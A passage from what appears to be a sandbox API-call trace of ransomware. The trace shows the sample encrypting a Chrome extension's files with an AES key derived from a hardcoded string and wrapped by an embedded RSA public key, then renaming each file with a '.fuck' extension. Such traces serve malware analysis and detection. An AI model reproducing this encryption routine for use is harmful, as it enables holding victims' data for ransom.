pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.786] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0248.786] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x293cf90) returned 1 [0248.787] CryptImportPublicKeyInfo (in: hCryptProv=0x293cf90, dwCertEncodingType=0x1, pInfo=0x2931340*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931370*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931378*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x29389f8) returned 1 [0248.787] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0248.787] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293d788*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x293d788*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0248.787] WriteFile (in: hFile=0x5d50, lpBuffer=0x293d788*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x293d788*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0248.789] ReadFile (in: hFile=0x5d54, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0248.796] CryptEncrypt (in: hKey=0x29385b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0248.796] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0248.816] ReadFile (in: hFile=0x5d54, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0248.816] CryptEncrypt (in: hKey=0x29385b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0248.816] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0248.816] ReadFile (in: hFile=0x5d54, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0248.816] CryptEncrypt (in: hKey=0x29385b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0248.816] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0248.816] ReadFile (in: hFile=0x5d54, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x20d, lpOverlapped=0x0) returned 1 [0248.816] CryptEncrypt (in: hKey=0x29385b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x20d, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x210) returned 1 [0248.816] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x210, lpOverlapped=0x0) returned 1 [0248.817] CloseHandle (hObject=0x5d54) returned 1 [0248.817] CloseHandle (hObject=0x5d50) returned 1 [0248.817] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), bFailIfExists=0) returned 1 [0248.821] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png", dwFileAttributes=0x0) returned 1 [0248.822] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.gsg")) returned 1 [0248.823] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.fuck")) returned 1 [0248.824] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.824] CryptDestroyKey (hKey=0x29385b8) returned 1 [0248.824] CryptReleaseContext (hProv=0x293d898, dwFlags=0x0) returned 1 [0248.824] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0248.825] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0248.825] GetLastError () returned 0x0 [0248.825] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png")) returned 0x20 [0248.825] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png", dwFileAttributes=0x80) returned 1 [0248.825] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.826] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0248.826] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.gsg", dwFileAttributes=0x2) returned 1 [0248.827] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x293dde8) returned 1 [0248.829] CryptCreateHash (in: hProv=0x293dde8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0248.829] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0248.829] CryptHashData (hHash=0x29385b8, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.829] CryptDeriveKey (in: hProv=0x293dde8, Algid=0x6610, hBaseData=0x29385b8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2938978) returned 1 [0248.829] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.829] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0248.830] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x293d568) returned 1 [0248.830] CryptImportPublicKeyInfo (in: hCryptProv=0x293d568, dwCertEncodingType=0x1, pInfo=0x2931d00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931d30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931d38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x29375f8) returned 1 [0248.830] CryptEncrypt (in: hKey=0x29375f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0248.830] CryptEncrypt (in: hKey=0x29375f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293db40*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x293db40*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0248.830] WriteFile (in: hFile=0x5d54, lpBuffer=0x293db40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x293db40*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0248.832] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x8f, lpOverlapped=0x0) returned 1 [0248.833] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x8f, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x90) returned 1 [0248.833] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x90, lpOverlapped=0x0) returned 1 [0248.833] CloseHandle (hObject=0x5d50) returned 1 [0248.833] CloseHandle (hObject=0x5d54) returned 1 [0248.834] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), bFailIfExists=0) returned 1 [0248.838] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png", dwFileAttributes=0x0) returned 1 [0248.838] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.gsg")) returned 1 [0248.839] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.fuck")) returned 1 [0248.841] CryptDestroyHash (hHash=0x29385b8) returned 1 [0248.841] CryptDestroyKey (hKey=0x2938978) returned 1 [0248.841] CryptReleaseContext (hProv=0x293dde8, dwFlags=0x0) returned 1 [0248.841] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0248.841] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0248.841] GetLastError () returned 0x0 [0248.841] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html")) returned 0x20 [0248.845] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html", dwFileAttributes=0x80) returned 1 [0248.846] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0248.846] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.847] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.gsg", dwFileAttributes=0x2) returned 1 [0248.847] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x293d348) returned 1 [0248.850] CryptCreateHash (in: hProv=0x293d348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0248.850] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0248.851] CryptHashData (hHash=0x2938978, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.851] CryptDeriveKey (in: hProv=0x293d348, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x29385b8) returned 1 [0248.851] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.851] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0248.851] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x293d458) returned 1 [0248.851] CryptImportPublicKeyInfo (in: hCryptProv=0x293d458, dwCertEncodingType=0x1, pInfo=0x2931680*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29316b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29316b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2937a38) returned 1 [0248.851] CryptEncrypt (in: hKey=0x2937a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0248.851] CryptEncrypt (in: hKey=0x2937a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293def8*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x293def8*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0248.852] WriteFile (in: hFile=0x5d50, lpBuffer=0x293def8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x293def8*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0248.853] ReadFile (in: hFile=0x5d54, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x5c, lpOverlapped=0x0) returned 1 [0248.854] CryptEncrypt (in: hKey=0x29385b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x5c, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x60) returned 1 [0248.854] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x60, lpOverlapped=0x0) returned 1 [0248.854] CloseHandle (hObject=0x5d54) returned 1 [0248.854] CloseHandle (hObject=0x5d50) returned 1 [0248.854] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), bFailIfExists=0) returned 1 [0248.858] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html", dwFileAttributes=0x0) returned 1 [0248.858] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.gsg")) returned 1 [0248.860] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.fuck")) returned 1 [0248.860] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.861] CryptDestroyKey (hKey=0x29385b8) returned 1 [0248.861] CryptReleaseContext (hProv=0x293d348, dwFlags=0x0) returned 1 [0248.861] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0248.861] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0248.861] GetLastError () returned 0x0 [0248.861] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js")) returned 0x20 [0248.861] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js", dwFileAttributes=0x80) returned 1 [0248.861] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.862] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0248.862] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.gsg", dwFileAttributes=0x2) returned 1 [0248.863] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x293d018) returned 1 [0248.865] CryptCreateHash (in: hProv=0x293d018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0248.865] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0248.865] CryptHashData 